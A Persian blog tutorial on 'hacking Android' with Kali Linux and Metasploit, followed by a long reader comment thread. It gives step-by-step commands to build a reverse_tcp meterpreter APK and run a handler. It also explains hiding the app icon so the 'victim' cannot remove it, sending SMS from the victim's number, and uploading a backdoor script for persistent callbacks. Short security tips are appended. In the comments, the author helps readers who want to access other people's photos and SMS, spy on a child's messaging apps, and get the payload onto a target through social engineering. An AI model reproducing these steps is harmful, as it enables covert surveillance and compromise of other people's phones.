هک اندروید با استفاده از کالی لینوکس و راه های امنیت
در این اموزش به نحوه هک اندروید با استفاده از کالی لینوکس می پردازیم و روش های امنیت در مقابل این روش را اموزش میدهیم در این اموزش هک و امنیت با ما همراه باشید.
هک اندروید و امنیت
توضیحات درباره هک اندروید
سیستم عامل اندروید یکی از OS های محبوب در کل دنیا است که روزانه افراد بسیاری از ان استفاده میکنند
این OS برای دستگاه های موبایل طراحی شده است اما امکان نصب ان در هر سیستمی وجود دارد
به همین دلیل محبوبیت بسیاری دارد و افراد زیادی در ایران و دنیا از ان استفاده میکنند
در این اموزش با روش های تست نفوذ اندروید از طریق کالی لینوکس و فریمورک متاسپلویت اشنا میشویم و به طور کامل با آن کار خواهیم کرد.
متاسپلویت
متاسپلویت یک فریمورک قدرتمند تست نفوذ است که در اموزش متاسپلویت توضیحات کاملی را درباره ان خدمت شما عزیزان ارائه دادیم ؛ اما به طور خلاصه ابزاری است که در هر سیستم عاملی از جمله ویندوز قابل نصب است و به طور پیشفرض در کالی لینوکس وجود دارد،
و علت محبوبیت بسیار زیاد ان بزرگ بودن ان و استفاده از اکسپلویت ها و پیلود متنوع درون خود است
و ما در این اموزش با استفاده از یکی از پیلود های ان یک فایل برای تست امنیت یا هک اندروید خواهیم ساخت و ان را اجرا میکنیم.
اموزش ویدیو ای هک اندروید و امنیت
اموزش تست نفوذ اندروید
در ابتدا با دستور زیر وارد متاسپلویت شوید
msfconsole
بعد از کمی انتظار و باز شدن متا دستور زیر را برای تنظیم و ساخت apk وارد کنید
use android/meterpreter/reverse_tcp
حال تنظیمات مربوط به این پیلود را انجام دهید برای تنظیم ای پی دستور زیر را با ای پی خود وارد کنید، دقت داشته باشید در این بخش باید ای پی سرور خود را وارد کنید در صورتی که از سرور استفاده نمی کنید باید در سیستم خود ای پی ثابت بگیرید و پورت فورواردینگ انجام دهید که اموزش ان در پن تست کور قرار داده شده است.
set LHOST 127.0.0.1
و یک پورت را برای اتصال انتخاب کنید برای مثال ما پورت 6060 را استفاده میکنیم
set LPORT 6060
حال برای ساخت فایل اصلی هک اندروید که باید در اندروید نصب شود دستور زیر را وارد کنید
generate -f raw -o PentestCore.apk
دستور زیر را برای ایجاد اتصال بین پیلود وارد کنید
use multi/handler
و پیلود ساخته شده را ست نمایید ادرس پیلود در واقع ادرسی است که در دستور اول وارد کرده ایم
set PAYLOAD android/meterpreter/reverse_tcp
مجدد تنظیمات ای پی و پورت را مانند قبل انجام دهید دقت داشته باشید که تفاوتی بین ان ها نباشد
و در اخر برای اجرای کافیست دستور exploit را وارد کنید و تا نصب اپ اندروید ساخته شده منتظر بمانید
بعد از نصب سریعا و اجرا برنامه اتصال برقرار خواهد شد و دسترسی meterpreter به شما اده خواهد شد
و میتوانید دستورات خود را در سیستم عامل اندروید قربانی اجرا کنید یا از امکانات متاسپلویت برای ان استفاده کنید.
در صورتی که اندروید هدف روت شده باشد یعنی به بالا ترین سطح دسترسی رسیده باشد شما هم این دسترسی را خواهید داشت و اطلاعات حساس و هسته اندروید دسترسی خواهید داشت که امکانات بسیار زیادی را در اختیار شما خواهد گذاشت.
نحوه استفاده از meterpreter بعد از نفوذ
استفاده از 3 دستور پرکاربرد پس از گرفتن دسترسی از قربانی :
دستورات بسیار زیادی پس از دسترسی گرفتن از اندروید قربانی پیش روی شماست که می توانید با استفاده از دستور help تمام دستورات را مشاهده کنید و از آنها استفاده کنید، اما در این قسمت از آموزش قصد داریم شما را با 3 دستور مهم و کاربردی آشنا کنیم .
دستور اول : hide_app_icon
با استفاده از این دستور می توانید آیکن فایل مخرب خود را مخفی کنید تا قربانی شما توانایی حذف کردن ان را نداشته باشد تا دسترسی طولانی تری داشته باشید بتوانید تست نفوذ خود را بدون مشکلی پیش ببرید.
دستور دوم : check_root
با استفاده از دستور بالا می توانید نسخه سیستم عامل اندروید هک شده خود را چک کنید که ایا روت است یا خیر؟
تا اگر روت است با استفاده از بکدوری که در ادامه انرا به شما معرفی خواهیم کرد دسترسی خود دائمی کنید.
دستور سوم : send_sms -d number -t ” body text sms ”
دستور بالا دستور بسیار جذابی است که می توانید با استفاده از این دستور
با شماره قربانی یک sms به شماره مورد نظر خود ارسال کنید.
نکته : در قسمت number باید شماره مورد نظر که قصد دارید sms به ان ارسال شود را وارد کنید و در قسمت text باید متن دلخواه خود را وارد کنید و سپس بر روی enter کلیک کنید تا sms برای شماره مورد نظر شما با شماره قربانی ارسال شود.
ایجاد بکدور بر روی اندروید قربانی
در ابتدا باید با استفاده از دستوری که بالاتر به شما معرفی کردیم روت بودن اندروید قربانی خود را چک کنید و اگر اندروید تارگت شما روت بود می توانید با ایجاد یک بکدور دسترسی خود را دائمی کنید؛ به این منظور در ابتدا با استفاده از دستور زیر به مسیر اصلی اندروید بروید :
/ cd
سپس در این مرحله باید با استفاده از دستور زیر به مسیر sdcard وارد شوید :
cd /sdcard
سپس فایل بکدور که در انتهای آموزش برای شما قرار داده ایم را دانلود کنید و در مرحله بعدی با استفاده از دستور اپلود , اسکریپت موجود که با زبان bash نوشته شده است را بر روی اندروید قربانی خود اپلود کنید.
upload /root/Desktop/backdoor.sh /sdcard
دقت کنید که باید مسیر اسکریپت را به درستی وارد کنید تا عملیات اپلود به خوبی انجام شود.
در مرحله بعدی باید با استفاده از دستور shell ، محیط شل خود را به محیط شل اندروید تغیر دهید .
سپس مجددا دو دستور زیر را وارد کنید تا به محلی که در آن اسکریپت را آپلود کرده اید برسید :
/ cd
cd /sdcard
در این قسمت باید با استفاده از دستور زیر اسکریپت را برای اجرا بکدور بعد از هک اندروید وارد کنید :
sh lifetime.sh
در نهایت باید با استفاده از دستور reboot یک بار سیستم عامل اندروید قربانی را reboot کنید ، سپس زمانی که اندروید قربانی شما مجددا راه اندازی شما هر 20 ثانیه یک بار برای ای پی شما و پورت مورد نظر شما درخواست ارسال می کند که می توانید از اکسپلویت مولتی هندلر استفاده کنید و به دستگاه اندروید مورد نظر خود متصل شوید.
آموزش امنیت و جلوگیری از هک اندروید
- برای امنیت در اندروید روش های بسیاری وجود دارد که موارد زیر برخی از مهم ترین ان ها هستند :
- از انتی ویروس های اورجینال اندرویدی استفاده کنید
- از نصب برنامه های نامعتبر و کرک شده خود داری کنید
- با استفاده از کالی لینوکس تست نفوذ را بر روی دستگاه خود به صورت دوره ای انجام دهید.
- از دریافت برنامه به غیر از پلی استور خود داری کنید
- بر روی هر ینکی کلیک نکنید و وارد وبسایت های نامعتبر نشوید
- از انتی ویروس های فعال استفاده کنید که با نصب هر برنامه ان را اسکن کند
- دیتا های اصلی خود را در موبایل نگه داری نکنید تا درصورت هک اندروید نگرانی زیادی نداشته باشید
- پسورد مناسب قرار دهید تا درصورت در دسترس قرار گرفتن فیزیکی موبایل مورد نفوذ قرار نگیرد
دانلود ویدیو اموزشی
امید واریم از این اموزش هک اندروید و امنیت لذت برده باشید ، چناتنچه سوال یا پیشنهادی دارید از بخش نظرات در اخر همین صفحه ارسال کنید و در کوتا ترین زمان پاسخ داده خواهد شد
پایدار باشید.
۲۵۱ دیدگاه در “هک اندروید با استفاده از کالی لینوکس و راه های امنیت”
چطور با این برنامه به عکس و فیلم های شخص دسترسی داشته باشیم
بعد از گرفتن دسترسی میتوانید دستورات خود را اجرا کنید و هر کاری که نیاز دارید انجام بدین
عالیه
ای پی که میگه منظورش چیه دقیقن؟
و به جا ای پی میشه بهش ادرس ایمیل یا تلگرام بدم که اطلاعاتش واسم بیاد؟!
این اموزش برای ساخت پلود Apk است و تست نفوذ با استفاده از فایل Apk میباشد
در بخش ای پی یا ip باید ip سرور برای اتصال کلاینت را وارد کنید
سلام ببخشید من مودمم dlink DWM سیمکارت خور فلاشی هستش ولی زمانی که ایف کانفیگ رو برای \یدا کردن ایبی خودم میزنم در قسمت اول هیچ ایبی ندارم .وقتی هم تو ایرنترنت برس و جو کردم گفتند باید بورت فرواردینگ رو درست کنم و اینا ولی بازم به چیزی نرسیدم و نتوستم از متاسبلویت استفاده کنم اگه میشه راهنمایی کنید ممنون
بهتر است برای تست نفوذ از سرور های مجازی کالی لینوکس استفاده نمایید که امنیت بیشتری داشته باشید و نیازی به پورت فورواردینگ نداشته باشید
در صورتی که میخواهید از طریق سیستم خود انجام دهید در بخش جستجو پورت فورواردینگ را جستجو نمایید و اموزش مورد نظر را مشاهده کنید
سلام خسته نباشید
خوب ما بخوایم مثلا به یه گوشی متصل شیم اونوقت باید چجوری به اون گوشی که مده نظرمونه متصل شیم یعنی بدون اینکه گوشی دسته ما باشه میشه اینکارو کرد؟
درود تشکر
باید فایل apk که ساخته اید را به هر طریقی در سیستم اندرویدی که میخواهید دسترسی داشته باشید نصب نمایید
اقا من بخام به اسم ام اس هاش دسترسی پیدا کنم باید چیکار کنم؟
بعدش که اونو اجرا کرد
چجوری بهش دسترسی پیدا کنم؟
اس ام اسو میگم
درود
با زدن help میتوانید نحوه استفاده از متاسپلویت را مشاهده کنید درصورت امکان اموزشی جداگانه برای نحوه کارکرد متاسپلویت قرار خواهیم داد موفق باشید
سلام
ای پی که باید بزنیمو از کجا بدونیم چیه
درود
از سرور مجازی استفاده کنید هنگام خرید ای پی به شما داده میشود و یا میتوانید ای پی خود را با دستور ifconfig مشاهده نمایید
ببخشید من با vmware
داخل لینوکس شدم رمشم بالای یک گیگ گزاشتم بازم هنگ میکنه چیکار کنم؟
مقدار cpu اختصاص داده شده را بالا ببرید و مقدار رم را در سیستم عادلانه تقسیم کنید و بیشتر از منابع واقعی سیستم نزارید
من با cmd دستور ipconfig زدم دو تا ایپی زده بود یکی مال سیستم یکی مال vmware کدومو باید بزنم
بعد این ایپی هارو باید توی مودم هم port forwarding کنم یا نیازی نیس ؟
از داخل کالی لینوکس ifconfig بزنید و ای پی خود را مشاهده کنید اموزش پورت فورواردینگ هم در سایت جستجو نمایید و مشاهده کنید
با سلام و خسته نباشید
میخاستم بگم که من همه کار هارو انجام دادم برنامرم رو نصب کردم و اجرا کردم
ولی توی ترمینال چیزی نمیاد فقط مینویسه که
started revers tcp handler on 192.168.28.131:3030
چیکار کنم؟؟؟
درود و تشکر
شما مشکل در شبکه خود دارید درصورتی که از مجازی ساز ها استفاده میکنید network را بر روی NAT بگذارید و ای پی خود را درست وارد کنید و دقت داشته باشید دستگاه اندروید به شبکه داخلی یا خارجی شما متصل باشد
ببخشید ولی شبکه داخلی یا خارجی یعنی ب مودم من وصل باشه؟
شبکه داخلی زمانی است که مودم شما یک شبکه NAT ایجاد کرده باشد و شما در داخل یک شبکه خانگی قرار دارید و فقط میتوانید ارتباط بین دستگاه های متصل به ان شبکه برقرار کنید
شبکه خارجی شبکه بیرونی اینترنت است که هر زمان به اینترنت وصل باشید میتوانید به دستگاه متصل شوید و ازتباط از طریق شبکه جهانی اینترنت برقرار است
سلام ببخشید من برنامه رو ساختم ولی مجبور شدم از ترمینال خارج بشم و سیستم رو خاموش کنم الان که روشن کردم هر چی میزنم exploit چیزی نمیاد لطفا راهنماییم کنید خیلی مهمه.اگه میشه بفرستید به ایمیلم جواب مشکل رو
درود
در شبکه داخلی شما با خاموش و رشن شدن سیستم ممکن است ای پی ها در هر دستگاه تغیر کند و برای ثابت بودن کلاینت باید از no ip یا سرور مجازی استفاده نمایید که اموزش ها در سایت موجود است
دوتا مشکل دارم
اولیش: برای ثابت بودن ایپی ، چطور میشه از noip در متاسپلویت استفاده کرد؟ ( نحوه استفاده اش برای رات های اماده رو بلدم ولی برای متاسپلویت نه، اگه میتونی ی اموزش کوتاه براش بذار)
دومیش:برای هک در ماشین مجازی،بعد از port forwarding حتما باید فایروال سیستم هم غیرفعال بشه؟ اگه اره، تو کالی لینوکس چطور باید این کار رو کرد؟؟؟
درود
اموزش no ip در سایت قرار دارد و در صورت امکان برای متاسپلویت هم قرار خواهد گرفت
سلام
لطفا به من بگید چجوری پیلود رو transportکنم رو برنامه ی سیستمی؟؟؟؟
درود
این موضوع مبحث جداگانه ای دارد که بزودی اموزش ان قرار میگیرد و با دنبال کردن اموزش های PentestCore میتوانید از ان مطلع شوید
در صورت خارج شدن دوباره چجوری میتونیم به این قسمت دسترسی داشته باشیم
درود
با هر بار وارد شدن به حساب کاربری خود میتوانید به این اموزش دسترسی داشته باشید
من دسترسی گرفتم لطفا دستورات عملی دسترسی به همه ی نقاط اندروید رو هم بذارید ممنون میشم
درود
مستوانید سویچ های راهنمارا مشاهده کنید
بزودی اموزشی برای نحوه کنترل اندروید با این روش را قرار میدهیم
سلام
من این ارور هارو دارم لطفا راهنماییم کنید
[-] Handler failed to bind to 192.168.1.103:443:- –
[-] Handler failed to bind to 0.0.0.0:443:- –
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443).
درود
مشکلی در تنظیمات وجود دارد مجدد طبق اموزش پیش بروید
سلام . من دستور generate -t raw -f ex.apk رو میزنم
بجای ساخت برنامه برام آپشن ها و توضیحات سویچر هارو میاره که t جزشون نیس
باید سویچ دیگه ای رو بزنم؟
ا
درود
دستورات را کپی نکنید دستی وارد کنید بدون مشکل اجرا میشوند
احتمالا مشکل شما به دلیل کپی کردن دستورات بئده است
سلام شما برای دستیابی به تلگرام واینیستاگرام فرزندمون چه چیزیو پیشنهاد میکنید چه دوره ای رو
درود
در دوره اموزشی کالی لینوکس روش های کنترل موبایل به صورت کامل گفته شده میتوانید از ان استفاده کنید
برای مشاهده دوره های اموزشی از منو به بخش دوره ها مراجعه کنید
سلام اقا من میخوام اموزش ببینم و بینهایت علاقه دارم و هیچکسو نمیشناسم اموزشم بده فقط تو سایت ها خوندم و رو گوشی تبلتم لینوکس دیپلوی رو نصب کردم همین دگه کاری بلد نیستم
درود
شما میتوانید در دوره های اموزشی ما شرکت کنید و از مباحث پایه تا پیشرفته اموزش ببینید
سلام من دستورت رو دستی وارد میکنم در نهایت فایل رو نمیسازه
و اپشن ها رو توضیح میده و سویچ t-بینشون نیست
و تو دستور f- ..ا پی کی رو نوشته ساپورت نمیکنه هر چیزی هم که در توضیحاتش بود فایلشو نساخت
اخرین نسخه کاای ۱.۲۰۱۹
متااسپلویت ورژن ۵.۰.۲هم هست
ممنون
و تشکر
و سپاس بخاطر اموزشهاتون و وقتی که برای ما گذاشتید
درود
در نسخه جدید یعنی ورژن ۵ متاسپلویت کمی بعضی از سویچ ها تغیر کرده اند
برای انجام تست نفوذ از روش این اموزش باید از نسخه های قبل از ۵ استفاده کنید
بزودی اموزش های دیگری با استفاده از متاسپلویت ۵ قرار خواهیم داد
موفق باشید
سلام وقتتون بخیر بنده exploit رو که میزنم و بعد اون هدفم اپلیکیشن رو نصب میکنه ولی بعد از چند ثانیه دستور died میده و باید دوباره من exploit کنم و هدفم هم دوباره رو اپ کلیک کنه تا من دوباره دسترسی داشته باشم به گوشیش برای اینکه این اتفاق نیافته باید چکار کنم ممنون میشم راهنمایی کنید
درود
بله در بعضی از دستگاه ها ممکن است مشکلات به این صورت به وجود اید میتوانید پبلود های دیگر اندروید را در دستگاه مورد نظر تست کنید یا از رات ها استفاده کنید که اموزش های ان ها در سایت موجود است و با جستجو میتوانید مشاهده کنید
سلام من روی وی ام کالی دارم با اون بسازم میتونم ای پی وی پی اس مو ک ویندوز سرور روش نصبه رو بدم بعد چجوری از روی وی پی اس وصل شم ؟ یا کلا متااسپلویت رو روی ویندوز سرور روی وی پی اس نصب کنم همونجا بسازم؟
درود
بله باید ای پی سرور کجازیتونو بدید و از داخل سرور مجازی ان را کنترل کنید
بهتره از سرور مجازی کالی لینوکس استفاده کنید اما میتوانید در ویندوز هم متاسپلویت را نصب کنید و این کار را انجام دهید
برای تهیه سرور مجازی به سایت اول سرور مراجعه کنید
موفق باشید
سلام ببخشید من پیلود که درست میکنم فقط روی همون دستگاهی که باهاش ساختم نصب کنم کار میکنه روی مبایل دیگم نصب کردم هرچی کلیک میکنه روی ویروس هیچ اتفاقی داخل مولتی هندلر نمی افته انگار کسی روش کلیک نکرده مشکل چیه
درود احتمالا مشکل از شبکه و ip داخلی شما است باید از ای پی ثابت استفاده کنید که چند راه وجود دارد ۱- از پورت فورواردینگ و no ip استفاده کنید ۲- سرور مجازی تهیه کنید و به صورت امن و بدون دردسر از این روش استفاده کنید
سلام لطفا یه اموزش بزارید که ازvps چطور استفاده کنیم وقتی داخل متا اکسپلویت میکنم روی vps بایند نمیشه فقط ایپی خودشو قبول میکنه
درود
اگر سرور مجازی کالی لینوکس تهیه کرده باشید با همین دستورات میتوانید به راحتی apk را بسازید فقط کافیست در هنگام ست کردن ip , ip سرور خود را بدهید
سلام ببخشید این پورت فورواردینگ که با سایتserveo.net روی مبایل انجام میدن امن هست یا این ردیابی میشه
درود
سایت های زیادی برای این کار هستند اما به صورت کلی روش پورت فورواردینگ با استفاده از این وبسایت ها ،به راحتی ای پی اصلی شما را در اختیار میگذارد
باسلام
من یک چیزی را متوجه نشدم
الان من در ویندوز لپ تاپم Vmware نصب کردم و روی اون Vmware کالی لینوکس نصب کردم
حالا برای قضیه ip ثابت باید دقیقا چیکار کنم؟
اینکه سرور مجازی بخرم و همون ip رو در کالی(که روی Vmهست) بجای ip وارد کنم کافیه؟
یا باید پورت فورواردینگ هم بکنم؟ (اگه اره چجوری ؟؟؟)
یا باید کلا کالی رو جای دیگه ای نصب کنم؟؟
لطفا کامل و به زبان ساده بگید من مبتدی هستم 🙂
ممنون
درود
در صورت تهیه سرور مجازی داخل همان سرور باید تمامی کار ها را انجام دهید و از داخل همان ، دستگاه مورد نظر را کنترل نمایید
اگر میخواهید در مجازی ساز سیستم خانگی خود اینکار را انجام دهید اموزش پورت فورواردینگ و noip را در سایت جستجو و مشاهده کنید
سلام بعد از دستور ساخت فایل apk فایل را نمیسازد !
درود در نسخه جدید کمی تغیرات ایجاد شده است که در اموزش بزودی اضافه میکنیم یا میتوانید از سویچ help تغیرات را مشاهده کنید
در صورتی که نتوانستید بسازید میتوانید نسخه قدیمی تر هم استفاده کنید
ایا میشه بدون سرور کارشو انجام داد؟
درود بله اما باید DNS ثابت بگیرید و پورت فورواردینگ انجام دهید
سلام وقت بخیر.من یک vm دارم و کالی رو روی ان نصب کردم و با هات اسپات اینترنت گرفتم .exploit که میخواد نصب بشه فقط دو دستور اول میاد و دیگه اتفاقی نمیفته با این حال فایل رو روی گوشی میخواستمنصب کنم نصب نمیشد مشکل کجاست ؟؟؟؟
درود
نسخه های خیلی قدیمی اندروید پشتیبانی نمیشود یا مراحلی از اموزش را به درستی انجام نداده اید مجدد برسی کنید یا ارور را ارسال کنید
سلام.با پایتون میشه انجام داد?
درود
پایتون یک زبان برنامه نویسی است که در صورتی که بلد باشید میتوانید ابزاری مشابه بنویسید به زبان پایتون و استفاده کنید
سلام من دستور generate رو وارد میکنم میره تنظیمات دستور رو میاره
درود
تغیراتی در سویچ های نسخه جدید ایجاد شده است که پست بروز شده و میتوانید مجدد تست کنید
سلام دوست عزیز خسته نباشید، این کد ها در متا نسخه ویندوز اجرا میشن؟
درود
بله مشکلی با نسخه ویندوز ندارند
ببخشید داداش من میخوام با ایپی پابلیک دسترسی بگیرم ولی ارور بایند شده رو میده ولی وقتی با اون یکی ایپی میزنم کار میکنه
درود
ممکن است اپ را از قبل ساخته باشد و حذف نکرده باشید
فایل را حذف کنید و با نام جدید ایجاد کنید
ای پی را هم به صورت دستی وارد نمایید و کپی نکنید
باز هم مشکلی داشتید ارور را ارسال کنید
سیستم عامل لیتوکس رو مجازی نصب نمیشه کامپیوتر رم و cpu ضغیفی داره اگه به جا ویندوز نصب کنم می تونم هک امنیت انجام بدم ؟؟؟
درود
شما میتوانیداز نسخه های کم حجم و سبک تر کالی لینوکس استفاده کنید
در صورتی هم که جایگزین سیستم عامل اصلی خود کنید مشکلی وجود نخواهد داشت اما باید حداقل منابع مورد نیاز کالی لینوکس را داشته باشید
سلام خسته نباشید
قسمت ساخت apk مشکل دارم
همش پیغام failed to load module دریافت میکنم ، ممنون میشم راهنماییم کنید.
درود و تشکر
مشکل ممکن است از سمت دیتابیس متاسپلویت شما باشد
سیستم عامل را اپدیت و ری استارت کنید
سلام من چندین بار قبل از آشنایی با سایت شما این کارو بدون مشکل انجام دادم.اما جدیدا هربار امتحان میکنم مشکلی در انتهای کار دارم.
بعد از اجرا و بعد از خط started reverse TCP …..
این خط واسم ظاهر نمیشه و کلا کار نمیکنه و اطلاعات واسم ارسال نمیشه
(این خط نمیاد)starting the payload handler….
هیچکس نتونسته مشکلم رو حل کنه.شما چیزی در مورد این مشکل میدونید؟
درود
احتمالا دستورات را اشتباه وارد میکنید طبق اموزش پیش بروید
در صورتی که مشکلی وجود داشت ارور خود را ارسال کنید تا دقیق تر بتوانیم راهنمایتان کنیم
سلام خسته نباشید ایا برای هک تارگت باید حتما توی یک شبکه باشند یا خیر ؟؟
ممنون از سایت خوبتون
درود
خیر در صورتی که خارج از شبکه باشد باید پورت فورواردینگ انجام دهید یا ای پی ثابت به صورت مستقیم داشته باشید
با سلام ممنون از اموزش خوبتوتون عالیه فقط من کالی لینکوسو نداشتم رفتم دانلودش کردم و روی فلش مموری بوت ساختم و کالی اونتوس من وقتی میخوام وارد لینکوس بشم یا باید نصبش کنم یا بصورت live برم خب به صورت live راحت نیستم میخوام نصبش کنم نمیشه به یه قسمتی میرسه میگه cd-dvd rom یه همچین چیزی و دو گزینه ی no و yes داره yes رو که میزنم از مرحله جلو تر نمیره و no رو که میزنم بر میگرده به مراحل قبل ممنون میشم کمک کنید
درود
دوست عزیز این سوال مربوط به این اموزش نیست اموزش نصب کالی لینوکس را در سایت جستجو و مشاهده کنید و در صورت مشکل در اموزش مربوطه سوال فرمایید
سلام من نمیتونم کالی رو نصب کنم و وقتی کی فایل apk درست میکنم نمیدونم چجوری وارد گوشی کنم و دستوراتی که باید برای گوشی قربانی بدم رو ندارم ممنون میشم کمک کنید
درود
شما چنین سوال کلی را پرسیدید که امکانش نیست در این بخش بتوان توضیح داد اما اموزش های ان ها در سایت قرار دارد با کمی جستجو یتوانید به ان دسترسی پیدا کنید
موفق باشید
سلام خسته نباشید
من متااسپولیت یا همون اپلیکیشن رو ساختم ولی نمیدونم چه طوری اون رو از داخل کالی لینوکس به گوشی خودم یا شخص مورد نظر ارسال کنم
اگه راهنماییم کنید ممنون میشم.
درود تشکر
اگر از مجازی ساز استفاده می کنید کافیه ان را کپی کنید و در سیستم عاملی اصلی منتقل کنید اگر هم که به صورت نصبی دارید با فلش استفاده یا در جایی اپلود کنید
سلام چه طوری اپلیکیشن یا همون متااسپولیت رو که ساختیم از کالی لینوکس خارجش کنیم یا بفرستیمش به فرد مورد نظر؟
ممنون میشم کمکم کنید .
درود
اموزش مهندسی اجتماعی را مشاهده کنید
سلام خسته نباشید .
ببخشید آیا ابزار شاخته شده با این روش رو می توان در تلفن همراه تارگت مورد نظر مخفی کرد ؟؟؟
ممنون .
درود و تشکر
برای این کار اموزش اسپای نوت را در سایت جستجو کنید این ابزار امکان مخفی کردن فایل نصب شده را دارد
سلام من برای پورت فرواردینک ای پی لینوکس رو میزنم اما ارور میده
درود
دقیق تر توضیح بدین مشکل را و ارور را ارسال کنید
سلام . خسته نباشید . ممنونم از آموزش کامل شما .
همه چیز درسته . ولی می خواستم بدونم که آیا غیر از sms ها و Contacts های تارگت . چیز های دیگر رو چه جوری می توان به دست آورد ؟؟
درود و تشکر
به بخش های زیادی از دستگاه مانند دوربین برنامه ها و … دسترسی پیدا میکنید که سعی میشود در اموزش های بعدی در این رابطه به صورت کامل اموزش قرار داده شود
سلام خسته نباشید. میخواستم بدونم که آیا بعد از این که تارگت فایل apk رو نصب و بعد حذف کنه باز هم به سیستم اندرویدی تارگت دسترسی داریم؟
یه سوال دیگه هم که داشتم اینه که ایا بعد از نصب برنامه خود به خود ناپدید میشه؟
درود تشکر از شما دوست عزیز
با حذف شدن اپ دسترسی شما هم از بین خواهد رفت برای حل مشکل هم میتوانید از بایندر ها استفاده کنید
در رابطه با سوال دوم خیر اما میتوانید این کار را بر روی اپ اعمال کنید یا
با اموزش نفوذ به اندروید این کار را با استفاده از رات ها میتوانید انجام دهید
سلام ایا میشه یک برنامه رو مثل گوکل پلی نصب کرد بدون مجوز کاربر
درود
خیر این امکان وجود ندارد مگر در صورت شخصی سازی و دستگاه باید به صورت روت شده باشد
سلام خسته نباشید
من رات رو ساختم ولی برنامه فقط روی همون گوشی که باهاش رات رو ساختم فعال میشه و روی بقیه گوشی ها فعال نمیشه
یعنی وقتی exploit رو مینویسم اگه برنامه روی همون گوشی که رات رو باهاش ساختم نصب باشه اینطوری رات فعال میشه و کار میکنه ولی روی گوشی دیگه ای کار نمیکنه
میشه بفرمایید مشکل از چیه؟
درود و تشکر
احتمالا مشکل از تنظیمات اتصال شبکه شماست اول باید بفرمایید که داخل شبکه داخلی انجام میشود یا خیر ؟
اگر از شبکه اینترنت برای اتصال استفاده می کنید باید پورت فورواردینگ انجام دهید و با استفاده از no ip یا روش های دیگر dns ثابت بگیرید که اموزش ان ها در سایت قرار داده شده است و میتوانید جستجو نمایید یا سرور مجازی بگیرید که نیازی به این کار ها نداشته باشید
سلام داداش من msfconsole رو ک وارد میکنم ۳ تا خط نوشته میاد
اولی rting the metasploit framework console…
دومی warning: no database support: no database YAML file
سومی سه تا ستارس
بعدش باز میکنه این مراحلو میرم اخرش ک باید یدونه فایل بسازه نمیسازه راهنمایی کن تورو خدا
درود
در مرحله اخر چه اروری دریافت میکنید؟
یک بار دستور زیر را برای اپدیت متاسپلویت خود هم وارد کنید.
apt-get update && apt-get dist upgrade
وقتی mafconsole رو میزنم
یه چیزایی مینویسه ک جمله آخرش اینه
From /uar/bin/mafconaole:48:in `<main
لطفا بگید چطور میتونم درستش کنم
درود
فایل های متاسپلویت شما به مشکل خورده یک بار کل برنامه های سیستم عامل خود را با دستور زیر اپدیت نمایید و سپس برسی کنید مشکل حل شده است یا خیر
apt-get update
سلام من همه کا را رو کردم و روی started reverse TCP handler هست باید چقدر من منتظر نصب کردنش باشم اخه فایل ۱ مگی اینقدر طول نمیکشه ۱۵ دقیقه هست نصب نمیشه
درود
دوست عزیز این بستگی به تارگتتون داره زمان مشخصی نداره
سلام وقت بخیر
هرکار میکنم این ارور میاد
root@kali:~# msfconsole
[-] ***rtinG the Metasploit Framework console…\
[-] * WARNING: No database support: No database YAML file
[-] ***
فایل و میسازه اما دسترسی نمیده فایل هم تو گوشی نصب نمیشه کامل
دستور inconfig ای پی ۱۲۷.۰.۰.۱ و میده چیکار باید بکنم
درود
با دستور زیر یک اپدیت کامل انجام دهید
get-apt update && apt-get upgrade
اتصال به شبکتون مشکل دارد و باید برسی کنید که به چه صورت اتصال را بر قرار کرده اید اگر از ماشین مجازی استفاده میک نید اموزش اتصال به اینترنت در vmware را مشاهده نمایید.
سلام چرا بعد از زدن use android/meterpreter/reverse_tcp دوباره تکرار میشه و در ضمن من تمامی مراحل رو رفتم ولی درست کار نکرد میشه کمک کنید ممنون
درود
منظور شما از دوباره تکرار میشه چیست ؟
باید شما مشکلی که دارید را به صورت دقیق بفرمایید تا بتوانیم شما را راهنمایی کنیم. می فرمایید (درست کار نکرده) ما نمیدانیم کدام بخش ایراد داشته و چه اروری داده است.
سلام دوباره….. میشه سایتی که متاسپلویت ات رو دانلود کردی به ماهم بگید ممنون از اموزشتان
درود
متاسپلویت به صورت پیشفرض داخل سیستم عامل کالی لینوکس نصب است
اما در صورتی که نیاز به فایل نصبی ان دارید میتوانید از لینک زیر اقدام کنید
https://www.metasploit.com/download
سلام من همه کارهارو انجام دادم به گوشی طرف هم وصل شدم ولی وقتی دستوری میزنم مثلا میزنم اس ام اس هاشو بیاره یا هر دستور دیگه ای میزنه not found لطفا بگین باید چیکار کنم
درود
دو علت میتواند داشته باشد ۱ – کلا sms و یا موارد دیگری که تست می کنید واقعا در دستگاه وجود ندارد. ۲ – در هنگام نصب محدودیت دسترسی برای برنامه تعریف کرده اند و اجازه دسترسی به این اطلاعات را به برنامه شما نداده اند.
با سلام می خواستم اگه امکانش هست دستور ساخت پیلود با استفاده از ddns که به جای آی پی، url وارد کنیم رو توضیح بدید، یعنی بعد از msfvenom -p android/meterpreter/reverse چی بزنیم یا داخل همین متاسپلویت دستور به چه شکل هست؟ممنون.
درود
برای این کار اموزش no ip و اموزش پورت فورواردینگ را مشاهده نمایید.
سلام. ببخشید وقتی وصل شد دستوری هست که با زدنش اگر برنامه رو هم ببنده قطع نشه
درود
تا زمانی که برنامه حذف نشود دسترسی دارید اما برای حل این مسئله می توانید یک برنامه مخفی دیگر با دسترسی که دارید نصب کنید که این امکان تر متاسپلویت وجود دارد و می توانید با دستور help ان ها را مشاهده کنید.
سلام خسته نباشید
توی فایل که روی سیستم هدف نصب میشه چطور باید دستورات موردنظرمون رو بنویسیم؟ مثلا بخوایم بگیم از صفحه اسکرین شات بگیر ایمیل کن، دستورش به چه زبانی باید نوشت؟ جاوا، بش، یا خود دستورات متا اسپلیت؟
درود و تشکر از شما
با دستورات خود متاسپلویت می توانید بیشتر مواردی که فرمودید را انجام دهید.
سلام بعد از اینکه دسترسی متر پرتر رو گرفتیم چه دستوراتی رو باید وارد کنیم مثلا برای دسترسی به اس ام اس باید چی بزنیم
درود از help متاسپلویت استفاده کنید برای مثال برای مشاهده اسمس ها می توانید دستور dump_sms را بزنید که البته داخل دوره کالی لینوکس به صورت کامل اموزش داده شده است.
سلام چرا نمیشه ما سوال بقیه که دنبال جواب هستن بدیم اجازه این کارو نداریم
درود
چرا می توانید پاسخ سوالات دیگران را بدهید در کنار هر دیدگاه گزینه پاسخ قرار دارد یک بار بر روی ان بزنید و سپس پاسخ را در بخش دیدگاه ارسال کنید به این صورت می توانید پاسخ سوالات دیگران را دهید.
